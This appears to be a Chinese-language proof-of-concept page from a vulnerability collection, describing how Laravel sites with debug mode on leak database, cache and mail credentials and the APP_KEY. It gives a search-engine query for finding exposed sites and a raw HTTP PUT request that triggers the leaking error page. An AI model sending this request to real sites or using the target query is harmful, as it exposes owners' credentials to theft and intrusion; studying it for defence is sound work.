POC00/laravel开启debug模式信息泄露漏洞.md
2025-04-02 22:36:18 +08:00

30 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# laravel开启debug模式信息泄露漏洞
# 一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.9);">laravel因配置不当会泄露MySQLRedisElasticMongodbneo4jpostgresqlSQLServerOracleFirebirdsqlitemail账号密码和APP</font><font style="color:rgb(215, 186, 125);">\_</font><font style="color:rgba(0, 0, 0, 0.9);">KEY等敏感信息。黑客可以利用这些信息进行脱库或者在服务器植入后门也可以利用数据库服务器进行跳板入侵内网其他重要服务器。</font>
# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
+ <font style="color:rgba(0, 0, 0, 0.9);">laravel</font>
# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
+ hunter`app.name=="Laravel Default Page"`
+ 特征
![1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2.png](./img/P88NvAGGM0PZp2co/1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2-494849.png)
# 四、漏洞复现
```plain
PUT /index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0
```
![1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f.png](./img/P88NvAGGM0PZp2co/1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f-688243.png)
> 更新: 2024-02-29 23:57:33
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tgvd9mmhbtzgbv2k>